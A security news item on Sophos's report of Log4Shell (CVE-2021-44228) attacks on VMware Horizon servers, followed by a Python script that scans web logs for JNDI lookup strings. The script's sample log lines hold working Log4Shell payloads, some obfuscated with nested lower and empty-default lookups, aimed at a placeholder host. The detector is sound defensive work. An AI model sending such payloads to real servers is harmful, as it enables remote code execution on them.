The Log4Shell vulnerability is being actively exploited to deliver backdoors and cryptocurrency miners to vulnerable VMware Horizon servers.
On Tuesday, Sophos cybersecurity researchers said the attacks were first detected in mid-January and are ongoing. Backdoors and cryptocurrency miners are not the only payloads: scripts are also being used to gather and steal device information.
Log4Shell is a critical vulnerability in the Apache Log4j Java logging library. The unauthenticated remote code execution (RCE) vulnerability was made public in December 2021 and is tracked as CVE-2021-44228 with a CVSS score of 10.0.
Researchers have warned that Log4Shell exploitation is likely to continue for years, especially given how simple the bug is to exploit. Proof-of-concept code was released shortly after the bug's disclosure, making it easy for anyone with a modest skill set to exploit the vulnerability. Several incomplete patches were released, making it somewhat difficult for teams to patch vulnerable systems effectively. Consequently, some organizations chose to apply mitigation measures in conjunction with patching. According to Sophos, the latest Log4Shell attacks targeted unpatched VMware Horizon servers with three different backdoors and four cryptocurrency miners.
It can be difficult for companies to identify systems that were compromised by threat actors who exploited vulnerable Log4j instances. Companies should use as many detection tools as possible, including host-based and network intrusion prevention systems. Rules exist that can detect malicious network traffic and halt communications upon discovery.
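As an added illustration of the kind of detection rule mentioned above (this is example code written for this page, not Sophos', Splunk's or any product's rule), the script below scans web-server log lines for the JNDI lookup string that Log4Shell exploitation attempts carry. The sample log lines are constructed, the IP addresses are documentation-range placeholders, and the three lookup forms it normalizes (`${lower:...}`, `${upper:...}` and the empty-key `${::-...}` default) are a small, illustrative subset; a naive match on the literal text `${jndi:` misses the last two sample lines, which is why the normalization step matters.

```python
import re

# Constructed sample lines in Apache/nginx combined-log style. Lines 2-4 carry a
# lookup string in the User-Agent or the query string; lines 1 and 5 are benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [12/Jan/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Jan/2022:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [12/Jan/2022:10:01:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:r}mi://198.51.100.7:1099/x}"',
    '10.0.0.9 - - [12/Jan/2022:10:01:05 +0000] "GET /?q=${${::-j}${::-n}${::-d}${::-i}:dns://198.51.100.7/t} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.5 - - [12/Jan/2022:10:01:06 +0000] "GET /health HTTP/1.1" 200 2 "-" "kube-probe/1.22"',
]

# Innermost lookups that contain no further "${" or "}" characters.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_EMPTY_DEFAULT = re.compile(r"\$\{::-([^${}]*)\}")
# The resolved form we ultimately look for: ${jndi:<scheme>:...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Resolve nested lower/upper/empty-default lookups from the inside out.

    Each round rewrites only innermost lookups, so nested forms collapse one
    layer per round. The round limit guards against pathological input.
    """
    for _ in range(max_rounds):
        resolved = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        resolved = _EMPTY_DEFAULT.sub(lambda m: m.group(1), resolved)
        if resolved == text:
            return text
        text = resolved
    return text


def find_jndi_lookups(line: str) -> list[str]:
    """Return the lower-cased JNDI schemes (ldap, rmi, dns, ...) found in a line."""
    normalized = normalize_lookups(line)
    return [m.group(1).lower() for m in _JNDI.finditer(normalized)]


def scan_log(lines: list[str]) -> list[dict]:
    """Return one hit record per line that contains a JNDI lookup after normalization."""
    hits = []
    for index, line in enumerate(lines, start=1):
        schemes = find_jndi_lookups(line)
        if schemes:
            hits.append({"line_no": index, "schemes": schemes, "normalized": normalize_lookups(line)})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG_LINES):
        print(f"line {hit['line_no']}: jndi scheme(s) {hit['schemes']} -> {hit['normalized']}")
```

In practice this logic belongs in the SIEM or IPS rather than a standalone script: the same normalize-then-match approach is what the published Splunk and Sigma detections do, and the alert should carry the normalized string so an analyst can see at a glance which lookup scheme and destination host were requested.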
For a good example and further reading, see “Log4Shell - Detecting Log4j 2 RCE Using Splunk”.